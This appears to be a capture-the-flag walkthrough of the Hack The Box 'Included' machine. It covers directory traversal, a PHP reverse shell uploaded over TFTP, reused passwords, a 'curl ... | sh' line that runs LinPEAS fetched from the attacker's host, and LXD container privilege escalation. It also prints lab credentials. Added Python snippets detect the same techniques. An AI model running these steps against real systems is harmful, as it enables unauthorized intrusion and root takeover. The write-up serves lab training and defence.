Included Walkthrough
After the Pathfinder walkthrough, here I am with Included, so... let's hack and grab the flags.
As I mentioned before, the Starting Point machines are a series of 9 easy-rated machines that should be rooted in sequence. This means that to go through this box, you must first have completed the Pathfinder machine.
Enough talk, 🥱 Let’s Get It Started 🐱💻
Disclaimers: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedure to grab the flags! 🐱👤
00. Start Machine …
To start the machine, just click "Join Machine".

Then you can see the IP address for that machine. Usually it is 10.10.10.55
🤠

Before going into the enumeration steps, we can simply ping the IP address to check our VPN connection and whether the machine is alive. Sometimes a machine's firewall might block ping requests, but in most cases the ping will succeed! 🙂
┌──(root💀hidd3nwiki)-[StartingPoints/Included]
└─# ping 10.10.10.55 -c 2
PING 10.10.10.55 (10.10.10.55) 56(84) bytes of data.
64 bytes from 10.10.10.55: icmp_seq=1 ttl=63 time=297 ms
64 bytes from 10.10.10.55: icmp_seq=2 ttl=63 time=321 ms
--- 10.10.10.55 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1000ms
rtt min/avg/max/mdev = 296.954/308.942/320.931/11.988 ms
01. Enumeration First …
01.1 Fast ports scan
As usual, run Nmap fast scan for all TCP ports to identify the ports which are open.
nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.55
-n : Never do DNS resolution
-vv : Extra verbosity
--open : Output only open ports
-p- : Full TCP ports range (65535)
-T4 : Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network
Here is the output 👇
┌──(root💀hidd3nwiki)-[StartingPoints/Included]
└─# nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.55
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 13:26 EDT
Initiating Ping Scan at 13:26
Scanning 10.10.10.55 [4 ports]
Completed Ping Scan at 13:26, 0.29s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:26
Scanning 10.10.10.55 [65535 ports]
Discovered open port 80/tcp on 10.10.10.55
SYN Stealth Scan Timing: About 47.58% done; ETC: 13:28 (0:00:34 remaining)
Completed SYN Stealth Scan at 13:28, 64.20s elapsed (65535 total ports)
Nmap scan report for 10.10.10.55
Host is up, received reset ttl 63 (0.22s latency).
Scanned at 2021-05-24 13:26:58 EDT for 65s
Not shown: 65534 closed ports
Reason: 65534 resets
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 64.72 seconds
Raw packets sent: 79376 (3.493MB) | Rcvd: 78517 (3.141MB)
So again we have only port 80 open.
01.2 Run Nmap Scripting Engine
To get the best result, we can run the Nmap Scripting Engine against all open ports. Since we now know which ports are open, we can point the script engine at just those ports so it finishes as fast as possible.
┌──(root💀hidd3nwiki)-[StartingPoints/Included]
└─# nmap -sV -sC -oN DetailPorts.nmap -p 80 10.10.10.55
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 13:29 EDT
Nmap scan report for 10.10.10.55
Host is up (0.28s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.10.55/?file=index.php
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.54 seconds
We have only port 80 open here. Now you know what is next..
01.3 Discover more on port 80
Let's open a web browser and check what is served on port 80.

By looking at the URL, we can assume that we have a Directory Traversal vulnerability here. So let's check it.
We can easily check this using the Burp Suite Repeater tab. Let's power up Burp Suite and navigate to the site again.

As you can see, we have a Directory Traversal vulnerability. If we can upload a reverse shell script, we can call that file through this vulnerability. But how do we upload the reverse shell file? I tried so hard to find a way but I could not. 😥😥
Then I looked closely at all the users listed in /etc/passwd using the directory traversal vulnerability. You know what I found there? There is also a user for TFTP. Wait, what.. How did we miss that port? 🤔🤔 Oh shoot! It's running on UDP port 69.

Let's run Nmap again and check whether that port is alive.
┌──(root💀hidd3nwiki)-[StartingPoints/Included]
└─# nmap -sU -p69 10.10.10.55
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 15:17 EDT
Nmap scan report for 10.10.10.55
Host is up (0.31s latency).
PORT STATE SERVICE
69/udp open|filtered tftp
Nmap done: 1 IP address (1 host up) scanned in 3.67 seconds
Yay!! It's alive. Let's try to connect to that service.
┌──(root💀hidd3nwiki)-[StartingPoints/Included]
└─# tftp 10.10.10.55
tftp> ?
Commands may be abbreviated. Commands are:
connect connect to remote tftp
mode set file transfer mode
put send file
get receive file
quit exit tftp
verbose toggle verbose mode
trace toggle packet tracing
status show current status
binary set mode to octet
ascii set mode to netascii
rexmt set per-packet retransmission timeout
timeout set total retransmission timeout
? print help information
Yes, we can connect to that service, and we can also upload any file using it. Now we have an idea 💡💡. But how do I know the exact path where that file is stored?
Again, we can check the /etc/passwd file to get an idea about the home directory.

Fine! Now we know where my file will be located after I upload it over TFTP. 😋😋
02. Foothold
First we need to create a PHP reverse shell. We can simply copy it from our Kali webshells directory or use this site.

After editing the above sections you can copy that part of the code and paste it into the file.

Now, let's use TFTP and upload that file. Use the put command to upload the file.
┌──(root💀hidd3nwiki)-[StartingPoints/Included]
└─# tftp 10.10.10.55
tftp> put hidd3nwiki.php 👈
Sent 2708 bytes in 2.2 seconds
Then let's fire up a netcat listener and request that file using the Directory Traversal vulnerability. The path to the file will be /var/lib/tftpboot/filename.php

We successfully landed a reverse shell as www-data. It's good to spawn a TTY shell.
python3 -c "import pty; pty.spawn('/bin/bash')"
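From the defender's side, both the /etc/passwd read and the request for the uploaded file under /var/lib/tftpboot are visible in the web server's access log. The following is an added example, not part of the original walkthrough: it flags values of the file parameter that contain traversal segments or absolute paths. The log lines are constructed, and the Apache combined log format is an assumption.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache "combined" format (not taken from the box).
SAMPLE_LOG = """\
10.10.14.2 - - [24/May/2021:13:30:01 -0400] "GET /?file=index.php HTTP/1.1" 200 3704 "-" "Mozilla/5.0"
10.10.14.2 - - [24/May/2021:13:31:10 -0400] "GET /?file=../../../../etc/passwd HTTP/1.1" 200 1575 "-" "Mozilla/5.0"
10.10.14.2 - - [24/May/2021:13:31:40 -0400] "GET /?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1575 "-" "curl/7.74.0"
10.10.14.2 - - [24/May/2021:15:40:12 -0400] "GET /?file=/var/lib/tftpboot/filename.php HTTP/1.1" 200 0 "-" "curl/7.74.0"
10.10.14.9 - - [24/May/2021:15:41:00 -0400] "GET /images/overlay.png HTTP/1.1" 200 850 "-" "Mozilla/5.0"
"""

# client, ident, user, [timestamp], "METHOD target PROTO", status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" (\d{3}) ')


def reasons_for(value):
    """Return why an include-parameter value looks like path abuse."""
    decoded = value
    for _ in range(3):  # undo nested percent-encoding (e.g. %252e)
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    reasons = []
    if ".." in re.split(r"[/\\]", decoded):
        reasons.append("traversal")
    if decoded.startswith("/"):
        reasons.append("absolute-path")
    return reasons


def find_suspicious_includes(log_text, param="file"):
    """Return (client, status, value, reasons) for each flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, _timestamp, target, status = m.groups()
        # parse_qs already percent-decodes the value once.
        for value in parse_qs(urlsplit(target).query).get(param, []):
            reasons = reasons_for(value)
            if reasons:
                hits.append((client, int(status), value, reasons))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_includes(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged request is the part worth alerting on, since it means the application served the path instead of rejecting it.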
If you look around the /home directory, we have a user called mike. Since all these boxes are connected together [I mean, passwords are reused], we can try the passwords we found in the Pathfinder walkthrough. Let's try su mike

Yes! It was successful and we can grab the user flag using the Sheffield19 password. Now it's time for the root flag. 😎😎
03. Privilege Escalation
When it comes to privilege escalation, we can manually check things one by one, or we can simply run an automation script to do the searching for us. Since this is a Linux box, we can use LinPEAS.
First we need to copy that script to our machine.
wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
Then we can run a Python HTTP server to host that file from our end.
┌──(root💀hidd3nwiki)-[/home/…/Documents/HackTheBox/StartingPoints/Included]
└─# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Now we can use the wget command to download that file to the Included box. But here, I'm not going to download it and then run it. Instead, I use the curl command to run that file directly.
curl http://<YourIP>:8000/linpeas.sh | sh

We can identify interesting stuff by looking at the output file. 👇

As you can see, the mike user is in the LXD group. The LXD group is a high-privileged group on a Linux system.
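The same finding can be checked during a host audit. The following is an added example, not part of the original walkthrough: it lists who belongs to root-equivalent groups, including users whose primary group is one of them, which the member list in /etc/group does not show. The passwd and group contents are constructed, and watching docker and disk in addition to lxd goes beyond what this box shows.

```python
# Constructed sample files for illustration (not copied from the box).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mike:x:1000:1000:mike:/home/mike:/bin/bash
tftp:x:110:113:tftp daemon,,,:/var/lib/tftpboot:/usr/sbin/nologin
builder:x:1001:108::/home/builder:/bin/bash
"""
SAMPLE_GROUP = """\
root:x:0:
lxd:x:108:mike
mike:x:1000:
tftp:x:113:
"""

# lxd comes from the page; docker and disk are added here as other groups
# whose members can reach the host filesystem as root.
ROOT_EQUIVALENT_GROUPS = ("lxd", "docker", "disk")


def _records(text, min_fields):
    """Yield colon-separated records, skipping blanks, comments and short lines."""
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            fields = line.split(":")
            if len(fields) >= min_fields:
                yield fields


def root_equivalent_members(passwd_text, group_text, watched=ROOT_EQUIVALENT_GROUPS):
    """Map each watched group to the non-root users who belong to it."""
    gid_to_group, members = {}, {}
    for name, _pw, gid, member_list in (f[:4] for f in _records(group_text, 4)):
        if name in watched:
            gid_to_group[gid] = name
            members[name] = {m for m in member_list.split(",") if m}
    # Primary-group membership is recorded only in /etc/passwd, so reading
    # /etc/group alone under-reports who holds the privilege.
    for fields in _records(passwd_text, 7):
        user, gid = fields[0], fields[3]
        if gid in gid_to_group:
            members[gid_to_group[gid]].add(user)
    return {g: sorted(u - {"root"}) for g, u in members.items() if u - {"root"}}


if __name__ == "__main__":
    print(root_equivalent_members(SAMPLE_PASSWD, SAMPLE_GROUP))
```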

Here I found the lxd/lxc Group - Privilege escalation article from hacktricks, and I'm going to go through the second method in that article.
First, clone the following repository to your host and build an Alpine image.
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
After you have executed the build-alpine file, a tar.gz file should be created. The file name will be different from mine.

Now we can serve it from our Python HTTP server and download it onto the box with wget.

Now follow the article again. The following command will import the image and create privileged container with it.
lxc image import ./alpine*.tar.gz --alias myimage
lxc init myimage mycontainer -c security.privileged=true
Next we need to mount the host's root filesystem (/) into the container at /mnt/root.
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
Now let's interact with the container.
lxc start mycontainer
lxc exec mycontainer /bin/sh

As you can see, we have landed in a root shell. Now we can grab the root.txt file. It's located at /mnt/root/root/
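The container built above leaves a recognisable configuration behind: security.privileged=true together with a disk device whose source is the host's /. The following is an added example, not part of the original walkthrough: it audits instance configuration for that combination. The input is a constructed sample shaped like `lxc list --format json` output, and it is assumed that only the fields used here are present.

```python
import json

# Constructed sample shaped like `lxc list --format json` (fields trimmed).
SAMPLE_LXC_LIST = json.dumps([
    {"name": "mycontainer",
     "expanded_config": {"security.privileged": "true"},
     "expanded_devices": {
         "root": {"type": "disk", "path": "/", "pool": "default"},
         "mydevice": {"type": "disk", "source": "/",
                      "path": "/mnt/root", "recursive": "true"}}},
    {"name": "web",
     "expanded_config": {},
     "expanded_devices": {"root": {"type": "disk", "path": "/", "pool": "default"}}},
    {"name": "backup",
     "expanded_config": {"security.privileged": "false"},
     "expanded_devices": {
         "data": {"type": "disk", "source": "/srv/backup", "path": "/data"}}},
])

TRUE_VALUES = {"true", "1", "yes", "on"}


def audit_instances(lxc_list_json):
    """Flag privileged instances and instances that mount host paths."""
    findings = []
    for inst in json.loads(lxc_list_json):
        # Prefer the expanded view, which includes settings inherited from profiles.
        config = inst.get("expanded_config") or inst.get("config") or {}
        devices = inst.get("expanded_devices") or inst.get("devices") or {}
        privileged = str(config.get("security.privileged", "")).lower() in TRUE_VALUES
        # Pool-backed root disks have no absolute "source"; host bind mounts do.
        host_mounts = sorted(
            (dev["source"], dev.get("path", ""))
            for dev in devices.values()
            if dev.get("type") == "disk" and str(dev.get("source", "")).startswith("/"))
        whole_host = any(source == "/" for source, _ in host_mounts)
        if privileged and whole_host:
            severity = "critical"   # root in the container is root on the host's files
        elif privileged or host_mounts:
            severity = "review"
        else:
            continue
        findings.append({"name": inst["name"], "severity": severity,
                         "privileged": privileged, "host_mounts": host_mounts})
    return findings


if __name__ == "__main__":
    for finding in audit_instances(SAMPLE_LXC_LIST):
        print(finding)
```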


04. Post Exploitation
As you can see, there is a login.sql file in the /mnt/root/root directory. Let's open it.

And it reveals credentials. Daniel : SNDv*2wzLWf

Okay... I’ll see you on the next box! 🙋♂️🙋♂️

Find me on @twitter